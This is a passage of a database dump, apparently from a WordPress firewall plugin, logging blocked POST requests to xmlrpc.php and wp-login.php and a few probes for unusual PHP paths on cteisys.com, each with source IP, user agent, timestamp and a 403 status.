Firefox\\/33.0\"}','zkYEGB4byXZ79vSiChtr8Iu3',0,1664339955.1704,586,'','POST',403,0,515,0,1,'',0),('162.212.56.30',2731816990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','nHAoTk8JFbyclvN2MpsZi7uV',0,1664339957.7670,538,'','POST',403,0,515,0,1,'',0),('185.107.112.126',3110826110,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','2dCsJyEcIQ79pN0LoRAPHt86',0,1664339969.0159,545,'','POST',403,0,515,0,1,'',0),('208.109.68.254',3496822014,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','JXKVMGcDn3AUvRLdour851st',0,1664339971.3789,1129,'','POST',403,0,515,0,1,'',0),('116.202.117.198',1959425478,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','d8BoPwV3jYh6iXgQI0KeTv1x',0,1664339971.9059,860,'','POST',403,0,515,0,1,'',0),('185.2.6.12',3103917580,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','f3CAYd9NPqVTakWgwBOzjlUb',0,1664339975.1710,586,'','POST',403,0,515,0,1,'',0),('148.72.232.31',2487805983,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','1bAMVLGirw8fKQ0YhUcWJnxP',0,1664339982.3234,611,'','POST',403,0,515,0,1,'',0),('173.212.223.238',2916409326,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','qAmiLXHkfa37gx6MuDFwyvpd',0,1664339983.1101,497,'','POST',403,0,515,0,1,'',0),('51.89.228.130',861529218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','y095f8r3wzZhnHQLgVRe2FdP',0,1664339988.8356,1501,'','POST',403,0,515,0,1,'',0),('107.189.14.89',1807552089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','BWQ9HTeL72GflgtzJY6OPuoN',0,1664340789.2150,1223,'','POST',403,0,600,0,1,'',0),('142.93.56.89',2388473945,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','Fe0ugCAniWl83NbcEMRhqXmQ',0,1664340888.5166,1234,'','POST',403,0,600,0,1,'',0),('143.244.155.35',2415172387,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','Bg5lXKOym1ehA8Lvxbf4tUN2',0,1664340922.5304,556,'','POST',403,0,600,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/wp-content/wp-files-conficg.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','lpCxQajdOrJwR1eIot9bhBn4',0,1664341207.6198,648,'','POST',403,0,700,0,1,'',0),('45.76.147.0',759993088,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','7lhJkr4o58gFO2LusfVeixRZ',0,1664342274.7321,2156,'','POST',403,0,515,0,1,'',0),('188.68.47.69',3158585157,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','nmG26UBt0OLjAMySpVzNChfk',0,1664342284.8865,1248,'','POST',403,0,515,0,1,'',0),('52.179.81.192',884167104,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','WeF0hcNByXjuo1PD6Kl47mGU',0,1664342286.5021,530,'','POST',403,0,515,0,1,'',0),('51.68.11.199',860097479,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','Y2MJXSsKILyBbr1T7UeOQj34',0,1664342295.1792,495,'','POST',403,0,515,0,1,'',0),('109.235.66.248',1844134648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','5tWNyPgTpKoFaJEVvhwD43Ac',0,1664342296.1602,515,'','POST',403,0,515,0,1,'',0),('178.128.102.185',2994759353,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','hlusEzHGDVFp7oMKSjPwfyTe',0,1664342302.4940,502,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','47KQaz2NYUoegMAGOqPvnlHj',0,1664342309.0736,504,'','POST',403,0,515,0,1,'',0),('136.144.179.78',2291184462,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','TF07g5Lf3exBIaJR2sEZkYz8',0,1664342313.6458,672,'','POST',403,0,515,0,1,'',0),('45.143.81.51',764367155,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Ofd7MQKyzxDc423HX56qCksT',0,1664342315.1814,506,'','POST',403,0,515,0,1,'',0),('185.2.4.134',3103917190,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','zKBfnZciDA72HULlkbxPa8r9',0,1664343230.9283,17837,'','POST',403,0,600,0,1,'',0),('47.110.72.238',795756782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','heX0OAmiWRqf5dEFnyL9VPou',0,1664343257.7752,614,'','POST',403,0,600,0,1,'',0),('185.156.175.60',3114053436,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5uZRD68oHsWAyplCnqbNTJXv',0,1664343502.6169,14017,'','POST',403,0,515,0,1,'',0),('69.163.152.108',1168349292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','FImZzihsYrJp2ePOLkMK0yCE',0,1664344420.3978,18392,'','POST',403,0,600,0,1,'',0),('192.71.144.12',3225915404,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','GdHviesgDMT9P5afVmObZqKY',0,1664344446.3064,1410,'','POST',403,0,600,0,1,'',0),('34.86.38.165',576071333,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','G9zHexWcLTKdhRE7QMYNgfk8',0,1664345784.4371,16464,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','rJIzyhEsDom75WPiqRKMln6x',0,1664345783.3862,17634,'','POST',403,0,515,0,1,'',0),('160.16.210.199',2685457095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','gO2I1ecMsLiUJW6bRYwr7HAn',0,1664345806.0662,1537,'','POST',403,0,515,0,1,'',0),('211.13.204.1',3540896769,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','vo5etVTPOhykJBAbflY8xNIX',0,1664345811.8373,555,'','POST',403,0,515,0,1,'',0),('116.202.117.198',1959425478,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','7uYvhQWjwcPkDCN0MrUayB9l',0,1664345817.5541,551,'','POST',403,0,515,0,1,'',0),('37.251.155.62',637246270,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','B8wa3SXDoPiFVHOCNAWU9125',0,1664345819.0865,532,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','BxS4vdYpQrhCsuUl7IzXtaF6',0,1664345821.7975,580,'','POST',403,0,515,0,1,'',0),('128.199.100.142',2160551054,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','vdYineWoA6sq1PUMgyDVNpkl',0,1664346761.4050,17783,'','POST',403,0,600,0,1,'',0),('159.223.170.181',2682235573,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','1SZiNDjrpqwInWoa3l8hOEGC',0,1664346783.0454,496,'','POST',403,0,600,0,1,'',0),('129.226.11.117',2179074933,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','F5RSoWjnLYXPk0pVuqbdKHzE',0,1664347350.7988,13289,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','sybv8kw6AaNK19mDguidTXUn',0,1664347355.1060,8990,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','Pdm3qVG1gCEbh64UcaQeir2u',0,1664347344.6645,19550,'','POST',403,0,515,0,1,'',0),('50.62.177.214',842969558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','JDBbMpqUl41Z08wAntoOuT5H',0,1664347367.5173,1667,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','8ThFtzuCDvrIqgdm3fN7o5wx',0,1664347372.9549,553,'','POST',403,0,515,0,1,'',0),('142.93.48.70',2388471878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','Qeo926UZDxGX3dJwLTbC7RP8',0,1664347379.1091,1384,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','1ZmPvjzKsNRpAC3iGqJk8Dyd',0,1664347382.3274,640,'','POST',403,0,515,0,1,'',0),('72.167.77.106',1218923882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','UWVjkbmxFw8E6cgsIno7OMZp',0,1664347384.7215,488,'','POST',403,0,515,0,1,'',0),('128.199.195.166',2160575398,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','AYNCPF7dM6J1OcqeTEltrXhz',0,1664347393.9977,720,'','POST',403,0,515,0,1,'',0),('46.32.228.70',773907526,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','jMRqn8bfSGxVJeZt35KQokDa',0,1664347927.4458,17505,'','POST',403,0,600,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/deep-blue/megaframe/megapanel/inc/functions.php','','{\"1\":\"ALittle Client\"}','delyJbkUr0Eg8YpZz9PhILaj',0,1664348819.0636,11954,'','GET',403,0,700,0,1,'',0),('64.90.36.102',1079649382,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','i1YSQJ7Gd0zPZDI6H3mW8Kgc',0,1664349098.0798,709,'','POST',403,0,600,0,1,'',0),('148.72.214.194',2487801538,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','TSHK2kanOCLiZYsm8EuWMD6r',0,1664349124.6256,1728,'','POST',403,0,600,0,1,'',0),('165.140.71.65',2777433921,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','ep7hn1o3KwZzG6HsXvm2uayd',0,1664349563.8221,14080,'','POST',403,0,515,0,1,'',0),('208.109.68.254',3496822014,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','EiTJnrcK76RCDMegkzbsN4pa',0,1664349558.3213,19581,'','POST',403,0,515,0,1,'',0),('188.68.47.69',3158585157,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','h0HdCGaToj6eyiwlYfs7mvSp',0,1664349561.8588,16044,'','POST',403,0,515,0,1,'',0),('103.8.12.105',1728580713,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','xP6wTD3MghSfuB2lXF81GsEo',0,1664349582.4889,554,'','POST',403,0,515,0,1,'',0),('217.116.205.56',3648310584,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','sjHUy43SIRCPDwafk72Xvpmo',0,1664349583.4360,618,'','POST',403,0,515,0,1,'',0),('20.239.161.138',351248778,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','OIiVlZfMqQjKUYJ7FWXEke5s',0,1664349592.0759,1403,'','POST',403,0,515,0,1,'',0),('81.88.53.33',1364735265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','KVBmehDuT0yWPOSzrjGY3xQf',0,1664349599.9261,566,'','POST',403,0,515,0,1,'',0),('128.199.195.166',2160575398,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','di8L54IzVT7HlBG1ZNnxhsuk',0,1664349601.3121,633,'','POST',403,0,515,0,1,'',0),('188.166.103.30',3165021982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','c9KYpVMXr3bH4B8dRlJT2Fsz',0,1664349605.6500,592,'','POST',403,0,515,0,1,'',0),('51.68.11.203',860097483,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','AyGnZlEfpj28Wg0LcIk3VouU',0,1664349609.9175,675,'','POST',403,0,515,0,1,'',0),('40.127.3.88',679412568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','X6HMNFvAtZGKrEoWhIJmjxPa',0,1664349611.7501,789,'','POST',403,0,515,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','mwSOt6CNqHrGgKElcW2yoxMY',0,1664350242.0658,9167,'','POST',403,0,600,0,1,'',0),('81.70.248.169',1363605673,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','T8c46Youf1Z5bdLsWVlSwBvy',0,1664350267.3279,508,'','POST',403,0,600,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','G5COIDP2pmA9KLTuvz6NE8Sl',0,1664351385.0395,18505,'','POST',403,0,600,0,1,'',0),('187.32.211.193',3139490753,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','desyw1YlbG4CHJBzSUnfxAZj',0,1664351409.0240,483,'','POST',403,0,600,0,1,'',0),('185.2.6.12',3103917580,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','C6zPpIVGgdleYq5ZfT1uk03B',0,1664351883.0003,2923,'','POST',403,0,515,0,1,'',0),('207.180.235.153',3484740505,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','oRZdm9v3SQwgxtFHO4TrAhbX',0,1664351885.9849,1324,'','POST',403,0,515,0,1,'',0),('142.93.48.70',2388471878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','5P2kCNTmS7gR4x0JEUM3fZdK',0,1664351885.9871,1337,'','POST',403,0,515,0,1,'',0),('185.2.6.12',3103917580,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','cgF7BDJZ5mWQtsRSkplPMv2Y',0,1664351891.7318,574,'','POST',403,0,515,0,1,'',0),('13.67.56.103',222509159,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','Cnx6jMNRQ59blcPq4yvshB0w',0,1664351894.0328,572,'','POST',403,0,515,0,1,'',0),('103.141.97.27',1737318683,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','6GjbHzOf0BYExyTIsSQtJV5i',0,1664351902.8805,502,'','POST',403,0,515,0,1,'',0),('82.165.86.16',1386567184,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','UMOfc3Z5Ngb2P9R7xutjKrS4',0,1664351904.2817,497,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','ygsKxXtRjULFOVp63qZzo8wv',0,1664351907.1260,504,'','POST',403,0,515,0,1,'',0),('50.62.177.214',842969558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','9Q78jugIicFR06ovxhGkD4lB',0,1664351911.6523,560,'','POST',403,0,515,0,1,'',0),('37.120.132.83',628655187,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wkWxmrVuShnqtE6RKzGNv7db',0,1664352386.9423,11056,'','POST',403,0,515,0,1,'',0),('157.230.127.126',2649128830,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','SDb5hBtxniMyYQv4EKrF0PCX',0,1664352497.4659,1364,'','POST',403,0,600,0,1,'',0),('159.65.200.228',2671888612,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','wAtR19S5pE8NrjHFC4TIUzyZ',0,1664352522.7267,637,'','POST',403,0,600,0,1,'',0),('160.16.210.199',2685457095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','LYRqMb2rUdhOu6kjWHIFfPmi',0,1664353099.4589,1440,'','POST',403,0,515,0,1,'',0),('129.226.11.117',2179074933,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','IJsrVWGyA0BmO3dwlP1tgUi2',0,1664353101.4434,516,'','POST',403,0,515,0,1,'',0),('97.74.82.165',1632260773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','x2U7pgwF5WvinRjZz9Iq0srS',0,1664353104.1145,557,'','POST',403,0,515,0,1,'',0),('124.222.194.56',2094973496,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','sxDCWol1UnF7AwvbQZrfktLp',0,1664353107.8933,559,'','POST',403,0,515,0,1,'',0),('50.62.141.129',842960257,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','dmRbshg2qpCPAwVlBaof6c3I',0,1664353110.7903,521,'','POST',403,0,515,0,1,'',0),('185.107.113.160',3110826400,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','4ofBavOUmzP9VlHSpIX7Anrg',0,1664353114.4794,493,'','POST',403,0,515,0,1,'',0),('176.9.113.101',2953408869,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','0hI2zofrU4R67AuLEHWTtVgB',0,1664353125.6919,1279,'','POST',403,0,515,0,1,'',0),('81.161.229.250',1369564666,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','BRu9ciKjYVILGQnxOeH017sh',0,1664353190.7899,541,'','POST',403,0,515,0,1,'',0),('178.162.204.214',2997013718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','JhXHCnBZx6vVs2pagIDSd7R1',0,1664353204.6160,722,'','POST',403,0,515,0,1,'',0),('39.103.157.70',661101894,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','Wen2LSum9NkgQ0Xt8E1olcJj',0,1664353590.9011,463,'','POST',403,0,600,0,1,'',0),('167.71.141.164',2806484388,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','mdpnUtAMfjPa3zhsWLlRuJDO',0,1664353614.5109,1149,'','POST',403,0,600,0,1,'',0),('152.89.196.13',2556019725,'','https://cteisys.com/wp-content/wordpress-index-keyword.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; 